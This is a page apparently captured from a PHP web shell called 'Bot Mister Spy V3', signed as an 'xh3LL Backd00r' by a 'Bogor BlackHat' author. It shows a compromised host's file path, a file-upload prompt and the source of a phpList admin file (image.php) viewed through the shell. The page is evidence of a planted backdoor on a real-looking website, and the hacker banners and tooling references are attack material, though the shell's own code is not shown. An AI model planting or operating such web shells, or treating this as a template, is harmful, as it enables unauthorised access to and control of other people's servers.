Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/phplist/lists/admin/
Upload File :
Current File : /home/caballoscriollos/public_html/phplist/lists/admin/image.php

<?php
require_once dirname(__FILE__).'/accesscheck.php';

# make sure we have not send any output yet
ob_end_clean();

$id = !empty($_GET['id']) ? sprintf('%d',$_GET['id']) : 0;
if ($id) {
  $res = Sql_query("select * from {$tables["templateimage"]} where id = $id");
  $row = Sql_fetch_array($res);
}

if ($row["data"]) {
  if ($row["mimetype"]) {
    Header("Content-type: ".$row["mimetype"]);
  } else {
    header("Content-type: image/jpeg");
  }
  echo base64_decode($row["data"]);
} else {
  header("Content-Type: image/png");
  print base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAABGdBTUEAALGPC/xhBQAAAAZQTFRF////AAAAVcLTfgAAAAF0Uk5TAEDm2GYAAAABYktHRACIBR1IAAAACXBIWXMAAAsSAAALEgHS3X78AAAAB3RJTUUH0gQCEx05cqKA8gAAAApJREFUeJxjYAAAAAIAAUivpHEAAAAASUVORK5CYII=');
}

exit;
?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat